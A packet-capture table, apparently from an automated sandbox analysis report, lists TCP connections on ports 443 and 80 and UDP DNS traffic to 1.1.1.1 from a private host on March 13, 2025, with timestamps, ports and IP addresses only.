Mar 13, 2025 11:20:09.476655960 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.476686954 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.476701021 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.476713896 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.476737976 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.476754904 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.507731915 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.507747889 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.507797003 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.507833004 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.507853985 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.507882118 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.507896900 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.536703110 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.536732912 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.536787987 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.536803961 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.536834955 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.536853075 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.549408913 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.549498081 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.549519062 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.549536943 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.549573898 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.550102949 CET	60447	443	192.168.2.17	151.101.2.137
Mar 13, 2025 11:20:09.550122976 CET	443	60447	151.101.2.137	192.168.2.17
Mar 13, 2025 11:20:09.571141005 CET	60450	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:09.571187019 CET	443	60450	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:09.571294069 CET	60450	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:09.571665049 CET	60450	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:09.571682930 CET	443	60450	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:09.862827063 CET	60450	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:09.864072084 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:09.864099026 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:09.864470005 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:09.864837885 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:09.864854097 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:09.904325962 CET	443	60450	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:10.899477005 CET	60453	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:20:10.899523973 CET	443	60453	142.250.186.36	192.168.2.17
Mar 13, 2025 11:20:10.899612904 CET	60453	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:20:10.899966955 CET	60453	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:20:10.899985075 CET	443	60453	142.250.186.36	192.168.2.17
Mar 13, 2025 11:20:11.471471071 CET	443	60450	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:11.471592903 CET	60450	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:12.873374939 CET	443	60453	142.250.186.36	192.168.2.17
Mar 13, 2025 11:20:12.873929977 CET	60453	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:20:12.873958111 CET	443	60453	142.250.186.36	192.168.2.17
Mar 13, 2025 11:20:12.875097990 CET	443	60453	142.250.186.36	192.168.2.17
Mar 13, 2025 11:20:12.875211000 CET	60453	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:20:12.876404047 CET	60453	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:20:12.876511097 CET	443	60453	142.250.186.36	192.168.2.17
Mar 13, 2025 11:20:12.931282997 CET	60453	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:20:12.931303978 CET	443	60453	142.250.186.36	192.168.2.17
Mar 13, 2025 11:20:12.979290009 CET	60453	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:20:13.448241949 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:13.448407888 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:13.454740047 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:13.454765081 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:13.455063105 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:13.455070019 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:13.455390930 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:13.455395937 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:13.792157888 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:13.792684078 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:13.792721987 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:13.891154051 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:13.937259912 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:14.028542995 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:14.031822920 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:14.031861067 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:14.381845951 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:14.382536888 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:14.382585049 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:14.424418926 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:14.439006090 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:14.439057112 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:14.439126968 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:14.439254999 CET	60455	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:14.439274073 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:14.439301014 CET	443	60455	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:14.439354897 CET	60455	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:14.439373970 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:14.439449072 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:14.439851999 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:14.439865112 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:14.440084934 CET	60455	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:14.440112114 CET	443	60455	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:14.440356016 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:14.440392017 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:14.442332029 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:14.442363977 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:14.442424059 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:14.442687035 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:14.442703962 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:14.480242968 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:14.914951086 CET	60459	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:14.914989948 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:14.915071011 CET	60459	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:14.915426016 CET	60459	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:14.915438890 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:17.872067928 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:17.872289896 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:17.872361898 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:17.872404099 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:17.872975111 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:17.873001099 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:17.873202085 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:17.873208046 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:17.873378992 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:17.873384953 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:18.205722094 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:18.206197977 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:18.206229925 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:18.302694082 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:18.316117048 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:18.316246986 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:18.316262960 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:18.371288061 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:18.405217886 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:18.449289083 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.449453115 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.452815056 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:18.453185081 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.453197002 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.453397989 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.453403950 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.453569889 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.453574896 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.501221895 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.501346111 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.501395941 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.501967907 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.502002001 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.502172947 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.502183914 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.502235889 CET	60455	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.502372980 CET	443	60455	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.502449036 CET	60455	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.502541065 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.502551079 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.502573013 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.502582073 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.506370068 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:18.506438971 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:18.506494999 CET	60459	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:18.506525993 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:18.508910894 CET	60459	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:18.508936882 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:18.509102106 CET	60459	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:18.509109020 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:18.509228945 CET	60459	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:18.509234905 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:18.842466116 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:18.842819929 CET	60459	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:18.842855930 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:18.902873039 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.938414097 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:18.957273960 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:18.969104052 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:18.981290102 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:18.981328011 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:18.981416941 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:18.981750965 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:18.981770039 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:18.989250898 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.015136957 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.015317917 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.015638113 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.015650988 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.016586065 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.016637087 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.016686916 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.020239115 CET	60459	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:19.023350000 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.023401976 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.023464918 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.030457020 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.030555010 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.036885977 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.036957979 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.036972046 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.037019968 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.043509007 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.043550014 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.043637037 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.050158978 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.054630041 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.054644108 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.054742098 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.055170059 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.055182934 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.068152905 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:19.068197966 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:19.068286896 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:19.068685055 CET	60462	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:19.068687916 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:19.068703890 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:19.068722010 CET	443	60462	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:19.068795919 CET	60462	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:19.069072008 CET	60462	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:19.069087029 CET	443	60462	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:19.100263119 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:19.105585098 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.105606079 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:19.105742931 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:22.539201021 CET	443	60453	142.250.186.36	192.168.2.17
Mar 13, 2025 11:20:22.539352894 CET	443	60453	142.250.186.36	192.168.2.17
Mar 13, 2025 11:20:22.539432049 CET	60453	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:20:22.803972006 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:22.804085970 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:22.804167986 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:22.804203033 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:22.804789066 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:22.804810047 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:22.805020094 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:22.805026054 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:22.805288076 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:22.805294991 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:22.983779907 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:22.983943939 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:22.987608910 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:22.987618923 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:22.987835884 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:22.987842083 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:22.987895012 CET	60462	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:22.988040924 CET	443	60462	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:22.988101959 CET	60462	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:22.988152027 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:22.988157988 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:22.988188028 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:22.988193035 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:23.138159990 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:23.138546944 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:23.138583899 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:23.238121033 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:23.293227911 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:23.370831966 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:23.419280052 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:23.436104059 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:23.483267069 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:23.553203106 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:23.553282022 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:23.553710938 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:23.553721905 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:23.567071915 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:23.572596073 CET	60453	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:20:23.572630882 CET	443	60453	142.250.186.36	192.168.2.17
Mar 13, 2025 11:20:23.611139059 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:33.430460930 CET	49693	80	192.168.2.17	142.250.186.99
Mar 13, 2025 11:20:33.430542946 CET	49695	80	192.168.2.17	199.232.210.172
Mar 13, 2025 11:20:33.435543060 CET	80	49693	142.250.186.99	192.168.2.17
Mar 13, 2025 11:20:33.435652018 CET	49693	80	192.168.2.17	142.250.186.99
Mar 13, 2025 11:20:33.435837030 CET	80	49695	199.232.210.172	192.168.2.17
Mar 13, 2025 11:20:33.435900927 CET	49695	80	192.168.2.17	199.232.210.172
Mar 13, 2025 11:20:34.000989914 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:34.001025915 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:34.001050949 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:34.001076937 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:34.001096010 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:34.001118898 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:34.001128912 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:34.001205921 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:34.001437902 CET	60461	443	192.168.2.17	92.123.12.11
Mar 13, 2025 11:20:34.001446962 CET	443	60461	92.123.12.11	192.168.2.17
Mar 13, 2025 11:20:34.001482964 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:34.001545906 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:34.001590014 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:34.001641035 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:34.001661062 CET	60456	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:34.001674891 CET	443	60456	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:34.001750946 CET	60460	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:34.001760006 CET	443	60460	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:34.001804113 CET	60454	443	192.168.2.17	92.123.12.9
Mar 13, 2025 11:20:34.001823902 CET	443	60454	92.123.12.9	192.168.2.17
Mar 13, 2025 11:20:34.001949072 CET	60458	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:34.001966000 CET	443	60458	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:34.001986980 CET	60451	443	192.168.2.17	209.94.90.1
Mar 13, 2025 11:20:34.001992941 CET	443	60451	209.94.90.1	192.168.2.17
Mar 13, 2025 11:20:34.011404037 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:20:34.011492968 CET	60459	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:34.013400078 CET	60459	443	192.168.2.17	104.26.12.205
Mar 13, 2025 11:20:34.013415098 CET	443	60459	104.26.12.205	192.168.2.17
Mar 13, 2025 11:21:10.948559999 CET	60468	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:21:10.948627949 CET	443	60468	142.250.186.36	192.168.2.17
Mar 13, 2025 11:21:10.948704958 CET	60468	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:21:10.949126005 CET	60468	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:21:10.949141026 CET	443	60468	142.250.186.36	192.168.2.17
Mar 13, 2025 11:21:13.102998018 CET	443	60468	142.250.186.36	192.168.2.17
Mar 13, 2025 11:21:13.103379965 CET	60468	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:21:13.103399038 CET	443	60468	142.250.186.36	192.168.2.17
Mar 13, 2025 11:21:13.103765965 CET	443	60468	142.250.186.36	192.168.2.17
Mar 13, 2025 11:21:13.104115963 CET	60468	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:21:13.104181051 CET	443	60468	142.250.186.36	192.168.2.17
Mar 13, 2025 11:21:13.150316954 CET	60468	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:21:22.736088991 CET	443	60468	142.250.186.36	192.168.2.17
Mar 13, 2025 11:21:22.736181021 CET	443	60468	142.250.186.36	192.168.2.17
Mar 13, 2025 11:21:22.736232042 CET	60468	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:21:23.020508051 CET	49696	443	192.168.2.17	40.126.32.134
Mar 13, 2025 11:21:23.025677919 CET	443	49696	40.126.32.134	192.168.2.17
Mar 13, 2025 11:21:23.025783062 CET	49696	443	192.168.2.17	40.126.32.134
Mar 13, 2025 11:21:24.396969080 CET	60468	443	192.168.2.17	142.250.186.36
Mar 13, 2025 11:21:24.397001982 CET	443	60468	142.250.186.36	192.168.2.17

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 11:20:01.378104925 CET	53	52216	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:06.168592930 CET	53	56600	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:06.256119967 CET	57797	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:06.256278038 CET	65430	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:06.262248993 CET	53	60900	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:06.262912989 CET	53	65430	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:06.262924910 CET	53	57797	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:09.563134909 CET	54911	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:09.563514948 CET	53912	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:09.570013046 CET	53	54911	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:09.570569038 CET	53	53912	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:09.659027100 CET	53	57944	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:09.874300003 CET	53	62215	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:10.891587019 CET	52778	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:10.891726017 CET	53603	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:10.898478031 CET	53	53603	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:10.898514032 CET	53	52778	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:14.428576946 CET	61075	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:14.428862095 CET	56109	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:14.432472944 CET	60948	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:14.432739973 CET	59335	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:14.437105894 CET	53	61075	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:14.438467026 CET	53	56109	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:14.438534975 CET	53	53320	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:14.441874027 CET	53	59335	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:14.441912889 CET	53	60948	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:14.906570911 CET	50999	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:14.906804085 CET	59024	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:14.914108038 CET	53	50999	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:14.914429903 CET	53	59024	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:18.973272085 CET	54036	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:18.973665953 CET	62379	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:18.980519056 CET	53	54036	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:18.980532885 CET	53	62379	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:19.059570074 CET	53635	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:19.059895039 CET	50798	53	192.168.2.17	1.1.1.1
Mar 13, 2025 11:20:19.066637993 CET	53	50798	1.1.1.1	192.168.2.17
